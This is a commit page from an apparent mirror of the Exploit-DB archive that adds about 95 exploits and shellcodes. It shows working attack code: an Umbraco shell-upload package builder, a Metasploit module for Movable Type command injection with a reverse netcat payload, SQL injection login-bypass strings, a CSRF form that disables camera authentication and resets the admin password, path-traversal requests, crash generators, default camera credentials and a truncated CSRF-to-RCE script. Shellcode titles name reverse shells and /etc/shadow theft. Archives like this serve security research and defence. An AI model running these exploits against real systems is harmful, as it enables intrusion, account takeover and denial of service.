bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-10-30

Browse source 
95 changes to exploits/shellcodes

Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
Sandboxie 5.49.7 - Denial of Service (PoC)
WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
iDailyDiary 4.30 - Denial of Service (PoC)
RarmaRadio 2.72.8 - Denial of Service (PoC)
DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
Color Notes 1.4 - Denial of Service (PoC)
Macaron Notes great notebook 5.5 - Denial of Service (PoC)
My Notes Safe 5.3 - Denial of Service (PoC)

n+otes 1.6.2 - Denial of Service (PoC)

Telegram Desktop 2.9.2 - Denial of Service (PoC)

Mini-XML 3.2 - Heap Overflow
Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2)
Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3)
Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)
Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)

MariaDB 10.2 - 'wsrep_provider' OS Command Execution

Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free

Visual Studio Code 1.47.1 - Denial of Service (PoC)

DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)

MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)

Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)

GNU Wget < 1.18 - Arbitrary File Upload (2)

WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)

E-Learning System 1.0 - Authentication Bypass

PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting

GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting

EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting

Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated)

Library System 1.0 - Authentication Bypass

Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting

Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)

GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery

GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit)

Umbraco v8.14.1 - 'baseUrl' SSRF

Cacti 1.2.12 - 'filter' SQL Injection

GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery

Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated)
Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting
Xmind 2020 - Persistent Cross-Site Scripting
Tagstoo 2.0.1 - Persistent Cross-Site Scripting
SnipCommand 0.1.0 - Persistent Cross-Site Scripting
Moeditor 0.2.0 - Persistent Cross-Site Scripting
Marky 0.0.1 - Persistent Cross-Site Scripting
StudyMD 0.3.2 - Persistent Cross-Site Scripting
Freeter 1.2.1 - Persistent Cross-Site Scripting
Markright 1.0 - Persistent Cross-Site Scripting
Markdownify 1.2.0 - Persistent Cross-Site Scripting
Anote 1.0 - Persistent Cross-Site Scripting
Subrion CMS 4.2.1 - Arbitrary File Upload
Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection

Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated)

Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)

CHIYU IoT Devices - Denial of Service (DoS)

Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated)

TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)

WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal

Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)

Scratch Desktop 3.17 - Remote Code Execution

Church Management System 1.0 - Arbitrary File Upload (Authenticated)

Phone Shop Sales Managements System 1.0 - Arbitrary File Upload

Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS)

WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting

ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)

KevinLAB BEMS 1.0 - Authentication Bypass

Event Registration System with QR Code 1.0 - Authentication Bypass

CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF)

Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password)

qdPM 9.2 - Password Exposure (Unauthenticated)
ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)
Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit)

GeoVision Geowebserver 5.3.3 - Local FIle Inclusion

Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated)

Umbraco CMS 8.9.1 - Directory Traversal

Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Dolibarr ERP 14.0.1 - Privilege Escalation

Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS)

Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation

Phpwcms 1.9.30 - Arbitrary File Upload

Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)
Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)
Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)
Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)
Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)
Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)
Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)
Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
This commit is contained in:
Offensive Security 2021-10-30 05:02:09 +00:00
parent f33a724e0b
commit de260aeac6
97 changed files with 9430 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

72
exploits/aspx/webapps/50241.py Executable file
View file

@ -0,0 +1,72 @@
# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
# Exploit Author: BitTheByte
# Description: Authenticated path traversal vulnerability.
# Exploit Research: https://www.tenable.com/security/research/tra-2020-59
# Vendor Homepage: https://umbraco.com/
# Version: <= 8.9.1
# CVE : CVE-2020-5811
import string
import random
import argparse
import zipfile
import os
package_xml = f"""<?xml version="1.0" encoding="utf-8"?>
<umbPackage>
<files>
<file>
<guid>{{filename}}</guid>
<orgPath>{{upload_path}}</orgPath>
<orgName>{{filename}}</orgName>
</file>
</files>
<info>
<package>
<name>PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}</name>
<version>1.0.0</version>
<iconUrl></iconUrl>
<license url="http://opensource.org/licenses/MIT">MIT License</license>
<url>https://example.com</url>
<requirements>
<major>0</major>
<minor>0</minor>
<patch>0</patch>
</requirements>
</package>
<author>
<name>CVE-2020-5811</name>
<website>https://example.com</website>
</author>
<contributors>
<contributor></contributor>
</contributors>
<readme><![CDATA[]]></readme>
</info>
<DocumentTypes />
<Templates />
<Stylesheets />
<Macros />
<DictionaryItems />
<Languages />
<DataTypes />
<Actions />
</umbPackage>
"""
parser = argparse.ArgumentParser(description='CVE-2020-5811')
parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
args = parser.parse_args()
if not os.path.isfile(args.shell):
print("[ERROR] please use a correct path for the shell file.")
output_file = "exploit.zip"
package = zipfile.ZipFile(output_file, 'w')
package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path))
package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read())
package.close()
print(f"[DONE] Created Umbraco package: {output_file}")

28
exploits/aspx/webapps/50462.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF
# Date: July 5, 2021
# Exploit Author: NgoAnhDuc
# Vendor Homepage: https://our.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases/8141
# Version: v8.14.1
# Affect: Umbraco CMS v8.14.1, Umbraco Cloud
Vulnerable code:
Umbraco.Web.Editors.HelpController.GetContextHelpForPage():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91
PoC:
/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=
https://SSRF-HOST.EXAMPLE/
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/
Notes:
- There's no "/" suffix in payload 1
- "/" suffix is required in payload 2 and payload 3
- "section" parameter value must be changed each exploit attempt

112
exploits/cgi/webapps/50464.rb Executable file
View file

@ -0,0 +1,112 @@
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Movable Type XMLRPC API Remote Command Injection",
'Description' => %q{
This module exploit Movable Type XMLRPC API Remote Command Injection.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Etienne Gervais', # author & msf module,
'Charl-Alexandre Le Brun' # author & msf module
],
'References' =>
[
['CVE', '2021-20837'],
['URL', 'https://movabletype.org/'],
['URL', 'https://nemesis.sh/']
],
'DefaultOptions' =>
{
'SSL' => false,
},
'Platform' => ['linux'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'DisclosureDate' => "2021-10-20",
'DefaultTarget' => 0,
'Targets' => [
[
'Automatic (Unix In-Memory)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }
}
]
]
))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of the MovableType', '/cgi-bin/mt/'])
], self.class
)
end
def cmd_to_xml(cmd, opts={})
base64_cmd = Rex::Text.encode_base64("`"+cmd+"`")
xml_body = <<~THISSTRING
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
#{base64_cmd}
</base64>
</value>
</param>
</params>
</methodCall>
THISSTRING
end
def check
begin
fingerprint = Rex::Text.rand_text_alpha(32)
command_payload = cmd_to_xml("echo "+fingerprint)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'mt-xmlrpc.cgi'),
'ctype' => 'text/xml; charset=UTF-8',
'data' => command_payload
})
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") if res.code != 200
if res && res.body.include?("Can't locate "+fingerprint)
return Exploit::CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
Exploit::CheckCode::Safe
end
def exploit
begin
command_payload = cmd_to_xml(payload.raw)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'mt-xmlrpc.cgi'),
'ctype' => 'text/xml; charset=UTF-8',
'data' => command_payload
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end

67
exploits/hardware/webapps/49459.txt Normal file
View file

@ -0,0 +1,67 @@
# Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com
Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure
Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model: iZero
Targa 512
Targa 504
Targa Semplice
Targa 704 TKM
Targa 805
Targa 710 INOX
Targa 750
Targa 704 ILB
Firmware: BLD201113005214
BLD201106163745
BLD200304170901
BLD200304170514
BLD200303143345
BLD191118145435
BLD191021180140
BLD191021180140
CPS: 4.013(201105)
3.100(200225)
3.005(191206)
3.005(191112)
Summary: IP camera with optical character recognition (OCR) software for automatic
number plate recognition (ANPR) also equipped with ADR system that enables it to read
the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
this camera suitable for all installation conditions. Its built-in OCR software works
as an automatic and independent system without the need of a computer, thus giving
autonomy to the device even in the event of an interruption in the connection between
the camera and the operations centre.
Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream
disclosure when p1.mjpg or p1.264 is called.
Tested on: GNU/Linux 3.10.53 (armv7l)
PHP/5.6.22
selea_httpd
HttpServer/0.1
SeleaCPSHttpServer/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5619
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php
07.11.2020
--
Connection to RTP/RTSP stream: rtsp://192.168.1.17/p1.264
Connection to M-JPEG stream: http://192.168.1.17/p1.mjpg

47
exploits/hardware/webapps/49937.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)
# Date: 01/06/2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021
# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC
# CVE: CVE-2021-31642
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.
CVE ID: CVE-2021-31642
CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642
Affected parameter: page=Component: if.cgi
Payload:
if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
====HTTP request======
GET
/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/AccLog.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to the CGI component (if.cgi)
3. Append the payload at the end of the vulnerable parameter (page)
4. Submit the request and observe payload execution
Mitigation: The latest version of the CHIYU firmware should be installed
to mitigate this vulnerability.

62
exploits/hardware/webapps/50146.txt Normal file
View file

@ -0,0 +1,62 @@
# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kevinlab.com
Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
management platform. KevinLAB's BEMS (Building Energy Management System) enables
efficient energy management in buildings. It improves the efficient of energy use
by collecting and analyzing various information of energy usage and facilities in
the building. It also manages energy usage, facility efficiency and indoor environment
control.
Desc: The application suffers from an unauthenticated SQL Injection vulnerability.
Input passed through 'input_id' POST parameter in '/http/index.php' is not properly
sanitised before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
mechanism.
Tested on: Linux CentOS 7
Apache 2.4.6
Python 2.7.5
PHP 5.4.16
MariaDB 5.5.68
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5655
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
05.07.2021
--
PoC POST data payload (extract):
--------------------------------
POST /http/index.php HTTP/1.1
Host: 192.168.1.3
requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
PoC POST data payload (authbypass):
-----------------------------------
POST /http/index.php HTTP/1.1
Host: 192.168.1.3
requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]

79
exploits/hardware/webapps/50172.txt Normal file
View file

@ -0,0 +1,79 @@
# Exploit Title: Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF
# Date: 13.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.panasonic.com
<!--
Panasonic Sanyo CCTV Network Camera 2.03-0x CSRF Disable Authentication / Change Password
Vendor: Panasonic Corporation | SANYO Electric Co., Ltd.
Product web page: https://www.panasonic.com
https://www.sanyo-av.com
https://panasonic.net/sanyo/cs/index.html
Affected version: Model: VCC-HD5600P, FrmVer: 2.03-06 (110315-00), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3300P, FrmVer: 2.03-08 (111222-00), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3300P, FrmVer: 1.02-05 (101005-07), SubVer: 1.01-00 (100528-00)
Model: VCC-HD3300, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3100P, FrmVer: 2.03-00 (110204-02), SubVer: 1.01-00 (100528-00)
Model: VCC-HD2100P, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)
Summary: SANYO network camera and network optional board with the
latest H.264 compression technology provide the optimum surveillance
applications with high quality real time moving image at low bandwidth.
Simultaneous stream of H.264 and JPEG data and also COAX video out
to provide flexible solution for digital and analogue combined system.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. These actions can be exploited to perform authentication
detriment and account password change with administrative privileges if
a logged-in user visits a malicious web site.
Tested on: Embedded Linux
CGI
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5659
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5659.php
13.07.2021
-->
[CSRF]
[Anonymous user log in = ON]
orororororororororororororor
[Change admin password]
<html>
<body>
<form action="http://10.0.0.3:82/cgi-bin/user_registration.cgi" method="POST">
<input type="hidden" name="anonymous_sw" value="1" /> <!--Disable authentication-->
<input type="hidden" name="admin1_pw" value="Ztream0017" /> <!--Change admin password-->
<input type="hidden" name="admin2_pw" value="******" />
<input type="hidden" name="admin3_pw" value="******" />
<input type="hidden" name="operator_pw" value="********" />
<input type="hidden" name="guest_pw" value="*****" />
<input type="submit" value="Push" />
</form>
</body>
</html>
<!--
[Defaults]
admin:admin
admin2:admin2
admin3:admin3
operator:operator
operator2:operator2
guest:guest
-->

37
exploits/hardware/webapps/50211.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
# Date: 6-16-21 (Vendor Notified)
# Exploit Author: Ken 's1ngular1ty' Pyle
# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
# Version: <= 5.3.3
# Tested on: Windows 20XX / MULTIPLE
# CVE : https://www.geovision.com.tw/cyber_security.php
GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:
Nested Exploitation of the LFI, XSS, HTML / Browser Injection:
GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1
Absolute exploitation of the LFI:
POST /Visitor/bin/WebStrings.srf?obj_name=win.ini
GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini
Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.
ex. obj_name=INJECTEDHTML / XSS
The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors:
ex. /Visitor//%252e(path to target)
These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:
The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.
These attacks were disclosed as part of the IOTVillage Presentation:
https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4

16
exploits/hardware/webapps/50250.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS)
# Date: 2021-09-30
# Exploit Author: icekam,xiao13,Rainbow,tfsec
# Software Link: http://www.comprotech.com.hk/
# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
# CVE : CVE-2021-40378
There is a backdoor prefabricated in the device in this path. Accessing the
file through the browser after logging in will cause the device to delete
all data (including the data of the camera itself).
Payload:Visit this page after logging in
/cgi-bin/support/killps.cgi
please refer to:
https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md

23
exploits/ios/dos/49883.py Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
# Author: Luis Martinez
# Discovery Date: 2021-05-18
# Vendor Homepage: https://apps.apple.com/mx/app/webssh-ssh-client/id497714887
# Software Link: App Store for iOS devices
# Tested Version: 14.16.10
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 14.5.1
# Steps to Produce the Crash:
# 1.- Run python code: WebSSH_for_iOS_14.16.10.py
# 2.- Copy content to clipboard
# 3.- Open "WebSSH for iOS"
# 4.- Click -> Tools
# 5.- Click -> mashREPL
# 6.- Paste ClipBoard on "mashREPL>"
# 7.- Intro
# 8.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 300
print (buffer)

35
exploits/ios/dos/49952.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: Color Notes 1.4 - Denial of Service (PoC)
# Date: 06-04-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/gt/app/color-notes/id830515136
# Version: 1.4
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

35
exploits/ios/dos/49953.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC)
# Date: 06-04-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221
# Version: 5.5
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

35
exploits/ios/dos/49954.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC)
# Date: 06-04-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781
# Version: 5.3
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

35
exploits/ios/dos/49979.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: n+otes 1.6.2 - Denial of Service (PoC)
# Date: 06-09-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/n-otes/id596895960
# Version: 1.6.2
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

152
exploits/java/webapps/50131.py Executable file
View file

File diff suppressed because one or more lines are too long

137
exploits/java/webapps/50166.py Executable file
View file

@ -0,0 +1,137 @@
# Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)
# Date: 14.04.2021
# Exploit Author: niebardzo
# Vendor Homepage: https://www.cloverdx.com/
# Software Link: https://github.com/cloverdx/cloverdx-server-docker
# Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x
# Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker
# CVE : CVE-2021-29995
# Replace the target, payload and port to host the exploitation server. Exploit requires, inbound connection to CloverDX
# Victim authenticated to CloverDX and the java to run the ViewStateCracker.java.
# Reference for cracking ViewState:
# https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html
# https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
import http.server
import socketserver
import requests
from urllib.parse import urlparse
from urllib.parse import parse_qs
from bs4 import BeautifulSoup
import subprocess
import sys
import json
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-Type", "text/html; charset=utf-8")
self.end_headers()
# replace with your own target
